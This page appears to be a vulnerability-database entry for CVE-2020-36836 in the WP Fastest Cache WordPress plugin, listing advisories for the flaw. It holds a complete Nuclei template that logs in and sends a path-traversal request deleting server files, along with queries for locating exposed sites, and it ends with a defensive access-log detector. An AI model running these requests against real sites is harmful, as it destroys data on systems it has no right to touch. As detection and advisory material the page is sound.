| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2020-36836 | 6 Sep 2025 11:16 | – | circl |
| WordPress plugin WP Fastest Cache cross-site request forgery vulnerability | 16 Oct 2024 00:00 | – | cnnvd |
| CVE-2020-36836 | 16 Oct 2024 06:43 | – | cve |
| CVE-2020-36836 WP Fastest Cache <= 0.9.0.2 - Authenticated (Subscriber+) Arbitrary File Deletion | 16 Oct 2024 06:43 | – | cvelist |
| EUVD-2020-30788 | 16 Oct 2024 06:43 | – | euvd |
| CVE-2020-36836 | 16 Oct 2024 07:15 | – | nvd |
| CVE-2020-36836 | 16 Oct 2024 07:15 | – | osv |
| PT-2024-10846 | 15 Oct 2024 00:00 | – | ptsecurity |
| CVE-2020-36836 | 5 Feb 2025 15:09 | – | redhatcve |
| VulnCheck KEV: CVE-2020-36836 | 15 Oct 2024 00:00 | – | vulncheck_kev |
```yaml
id: CVE-2020-36836

info:
  name: WordPress WP Fastest Cache <= 0.9.0.2 - Authenticated Arbitrary File Deletion
  author: melmathari
  severity: high
  description: |
    The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
  impact: |
    Authenticated attackers with minimal permissions can delete arbitrary files from the server, potentially breaking the WordPress installation or exposing sensitive data.
  remediation: |
    Update WP Fastest Cache to version 0.9.0.3 or later to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6e699a-775e-4c59-a266-874eab5fa3a6
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36836
    - https://plugins.trac.wordpress.org/changeset/2342347/wp-fastest-cache
    - https://wearetradecraft.com/advisories/tc-2020-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2020-36836
    cwe-id: CWE-862
    epss-score: 0.01367
    epss-percentile: 0.68524
    cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    vendor: wpfastestcache
    product: wp_fastest_cache
    framework: wordpress
    shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/"
    fofa-query: "body=/wp-content/plugins/wp-fastest-cache/"
    publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
  tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache,vkev,vuln

variables:
  target_path: "languages"

flow: http(1) && http(2) && http(3) && http(4)

http:
  # 1. Confirm the plugin directory is present.
  - raw:
      - |
        GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
        internal: true

  # 2. Authenticate with the supplied low-privilege credentials.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302 || status_code == 200'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  # 3. Trigger the cache-deletion AJAX action with a traversing path.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?path=/../../../wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpfc_delete_current_page_cache

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'The cache of page has been cleared', 'success')"
          - "status_code == 200"
        condition: and

  # 4. Verify the targeted directory is gone.
  - raw:
      - |
        GET /wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - "status_code == 404"
        internal: true
# digest: 490a0046304402201ffe8f1c23587720509ad104ee9ef3da9c77e62fe604e33995f738359388fd35022044f1ce93d5eb72e39257f7712155b41d3230cfaed6bd40b29b41054951c52c95:922c64590222798bb761d5b6d8e72950
```
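The template above exercises the flaw through a `path` query parameter on `/wp-admin/admin-ajax.php` that climbs out of the expected directory with `../` segments. From the defender's side, that request shape is visible in ordinary web-server access logs even though the `action=wpfc_delete_current_page_cache` body is not logged. The following detector is an added example for this page, not part of the Nuclei template or of the plugin; the log lines, IP addresses and timestamps are constructed, and the combined-log regex assumes the common Apache/nginx format.

```python
"""Flag access-log lines matching the CVE-2020-36836 request shape:
a request to admin-ajax.php whose `path` query parameter contains a
directory-traversal segment (plain, percent-encoded or double-encoded).

Added example; the sample log below is constructed, not captured.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

AJAX_ENDPOINT = "/wp-admin/admin-ajax.php"


def _traverses(raw: str) -> bool:
    """True if `raw` contains a `..` path segment after up to two rounds of
    percent-decoding (catches %2e%2e and %252e%252e encodings)."""
    decoded = raw
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return any(seg == ".." for seg in decoded.replace("\\", "/").split("/"))


def inspect_line(line: str):
    """Return a finding dict for a suspicious line, or None.

    The AJAX action name lives in the POST body, which access logs do not
    record, so the observable is the traversing `path` query parameter."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if parts.path != AJAX_ENDPOINT:
        return None
    # parse_qs already applies one round of percent-decoding.
    for candidate in parse_qs(parts.query, keep_blank_values=True).get("path", []):
        if _traverses(candidate):
            return {
                "client": m["client"],
                "timestamp": m["ts"],
                "method": m["method"],
                "status": int(m["status"]),
                "path_param": candidate,
            }
    return None


def scan(lines):
    """Run inspect_line over every log line; return findings in order."""
    return [f for f in (inspect_line(ln) for ln in lines) if f]


# Constructed sample log (mirrors the four steps of the template above plus
# a benign cache-clear request that must not be flagged).
SAMPLE_LOG = """\
203.0.113.5 - - [16/Oct/2024:06:43:01 +0000] "GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Oct/2024:06:43:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Oct/2024:06:43:03 +0000] "POST /wp-admin/admin-ajax.php?path=/../../../wp-content/plugins/wp-fastest-cache/languages HTTP/1.1" 200 57 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Oct/2024:06:43:04 +0000] "POST /wp-admin/admin-ajax.php?path=%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fwp-content%2Fplugins%2Fwp-fastest-cache%2Flanguages HTTP/1.1" 200 57 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Oct/2024:06:45:10 +0000] "POST /wp-admin/admin-ajax.php?path=/blog/hello-world/ HTTP/1.1" 200 57 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Oct/2024:06:45:11 +0000] "GET /wp-content/plugins/wp-fastest-cache/languages HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

Only the two traversing requests are reported; the legitimate cache clear for `/blog/hello-world/` passes. A follow-up `404` on a plugin path that previously answered `200`, as in the last sample line, is a useful corroborating signal that the deletion succeeded.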